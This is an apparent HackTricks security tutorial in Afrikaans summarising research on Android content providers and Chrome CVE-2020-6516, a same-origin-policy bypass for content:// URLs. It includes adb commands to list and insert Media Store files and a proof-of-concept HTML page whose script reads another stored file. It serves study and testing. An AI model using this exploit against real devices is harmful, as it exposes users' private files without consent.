Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Dit is ’n opsomming van die pos https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/

Lys van LĂȘers in Media Store

Om lĂȘers wat deur die Media Store bestuur word, te lys, kan die onderstaande opdrag gebruik word:

$ content query --uri content://media/external/file

Vir ’n meer mensvriendelike uitset, wat slegs die identifiseerder en pad van elke geĂŻndekseerde lĂȘer vertoon:

$ content query --uri content://media/external/file --projection _id,_data

Inhoudverskaffers is geïsoleer in hul eie private naamruimte. Toegang tot ’n verskaffer vereis die spesifieke content:// URI. Inligting oor die paaie om toegang tot ’n verskaffer te verkry, kan verkry word uit toepassingsmanifeste of die Android-raamwerk se bronkode.

Chrome se Toegang tot Inhoudverskaffers

Chrome op Android kan toegang verkry tot inhoudverskaffers deur die content:// skema, wat dit in staat stel om hulpbronne soos foto’s of dokumente wat deur derdeparty-toepassings uitgevoer is, te benader. Om dit te illustreer, kan ’n lĂȘer in die Media Store ingevoeg word en dan via Chrome toeganklik gemaak word:

Voeg ’n pasgemaakte inskrywing in die Media Store in:

cd /sdcard
echo "Hello, world!" > test.txt
content insert --uri content://media/external/file \
--bind _data:s:/storage/emulated/0/test.txt \
--bind mime_type:s:text/plain

Ontdek die identifiseerder van die nuut ingevoegde lĂȘer:

content query --uri content://media/external/file \
--projection _id,_data | grep test.txt
# Output: Row: 283 _id=747, _data=/storage/emulated/0/test.txt

Die lĂȘer kan dan in Chrome gesien word met ’n URL wat saamgestel is met die lĂȘer se identifiseerder.

Byvoorbeeld, om lĂȘers wat verband hou met ’n spesifieke toepassing te lys:

content query --uri content://media/external/file --projection _id,_data | grep -i <app_name>

Chrome CVE-2020-6516: Same-Origin-Policy Bypass

Die Same Origin Policy (SOP) is ’n sekuriteitsprotokol in blaaiers wat webbladsye beperk om met hulpbronne van verskillende oorspronge te kommunikeer tensy dit eksplisiet toegelaat word deur ’n Cross-Origin-Resource-Sharing (CORS) beleid. Hierdie beleid het ten doel om inligtingslekke en cross-site request forgery te voorkom. Chrome beskou content:// as ’n plaaslike skema, wat strenger SOP-reĂ«ls impliseer, waar elke plaaslike skema-URL as ’n aparte oorsprong behandel word.

Egter, CVE-2020-6516 was ’n kwesbaarheid in Chrome wat ’n omseiling van SOP-reĂ«ls vir hulpbronne wat via ’n content:// URL gelaai is, toegelaat het. In werklikheid kon JavaScript-kode van ’n content:// URL toegang verkry tot ander hulpbronne wat via content:// URL’s gelaai is, wat ’n beduidende sekuriteitskwessie was, veral op Android-toestelle wat weergawes voor Android 10 gebruik, waar geskaalde stoor nie geĂŻmplementeer was nie.

Die bewys-van-konsep hieronder demonstreer hierdie kwesbaarheid, waar ’n HTML-dokument, nadat dit onder /sdcard opgelaai is en by die Media Store gevoeg is, XMLHttpRequest in sy JavaScript gebruik om toegang te verkry tot en die inhoud van ’n ander lĂȘer in die Media Store te vertoon, terwyl die SOP-reĂ«ls omseil word.

Proof-of-Concept HTML:

<html>
<head>
<title>PoC</title>
<script type="text/javascript">
function poc()
{
var xhr = new XMLHttpRequest();

xhr.onreadystatechange = function()
{
if(this.readyState == 4)
{
if(this.status == 200 || this.status == 0)
{
alert(xhr.response);
}
}
}

xhr.open("GET", "content://media/external/file/747");
xhr.send();
}
</script>
</head>
<body onload="poc()"></body>
</html>

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks